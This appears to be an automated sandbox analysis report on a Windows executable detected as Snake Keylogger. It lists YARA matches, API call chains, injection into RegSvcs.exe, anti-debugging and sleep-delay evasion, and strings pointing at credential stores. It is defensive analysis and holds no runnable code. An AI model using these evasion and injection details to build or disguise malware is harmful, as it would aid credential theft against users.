              Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034CE7A GetLastError,FormatMessageW, | 0_2_0034CE7A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033AB84 AdjustTokenPrivileges,CloseHandle, | 0_2_0033AB84
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0033B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 0_2_0033B134
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 0_2_0034E1FD
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00346532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, | 0_2_00346532
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0035C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, | 0_2_0035C18C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0030406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, | 0_2_0030406B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | File created: C:\Users\user\AppData\Local\Temp\autBBB4.tmp
              Source: mnXS9meqtB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003236000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003213000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.000000000412E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003242000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003222000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: mnXS9meqtB.exe | Virustotal: Detection: 56%
              Source: mnXS9meqtB.exe | ReversingLabs: Detection: 79%
              Source: unknown | Process created: C:\Users\user\Desktop\mnXS9meqtB.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Section loaded: wldp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: mnXS9meqtB.exe Static file information: File size 1132544 > 1048576
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: mnXS9meqtB.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: mnXS9meqtB.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: mnXS9meqtB.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: mnXS9meqtB.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: mnXS9meqtB.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: mnXS9meqtB.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0031E01E LoadLibraryA,GetProcAddress, 0_2_0031E01E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0031288B push 66003123h; retn 0037h 0_2_003128E1
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00326B05 push ecx; ret 0_2_00326B18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00423149 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_004231C8 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0040E21D push ecx; ret 2_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_03060D83 push ebx; retf 2_2_03060D92
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00368111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00368111
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0031EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0031EB42
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0032123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0032123A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe API/Special instruction interceptor: Address: D47AD4
              Source: mnXS9meqtB.exe, 00000000.00000003.2326466268.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000002.2346784176.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2327314610.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599874
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599765
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599654
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599546
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598795
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598685
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598572
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598125
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598015
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597906
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597796
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597687
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596921
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596484
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596374
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596264
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595978
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595685
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595567
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8304
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Evaded block: after key decision graph_0-93870
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94751
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe API coverage: 4.3 %
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00346CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00346CA9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_003460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_003460DD
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_003463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_003463F9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0034EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0034EB60
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0034F56F FindFirstFileW,FindClose, 0_2_0034F56F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0034F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0034F5FA
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00351B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00351B2F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00351C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00351C8A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_00351F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00351F94
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe Code function: 0_2_0031DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0031DDC0
Source: RegSvcs.exe, 00000002.00000002.4776308739.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- API call chain: ExitProcess graph end node -- graph_0-93309
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- API call chain: ExitProcess graph end node -- graph_0-93993
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00356AAF BlockInput
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00303D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00333920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0031E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00D46710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00D47DA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00D47D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0033A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_003281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00328189 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_004123F1 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AF3008
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0033B106 LogonUserW
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00303D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0034411C SendInput,keybd_event
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_003474BB mouse_event
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0033A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_003471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: mnXS9meqtB.exe -- Binary or memory string: Shell_TrayWnd
Source: mnXS9meqtB.exe -- Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_003265C4 cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Code function: 2_2_00417A20 GetLocaleInfoA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0035091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0037B340 GetUserNameW
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_00331E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\mnXS9meqtB.exe -- Code function: 0_2_0031DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
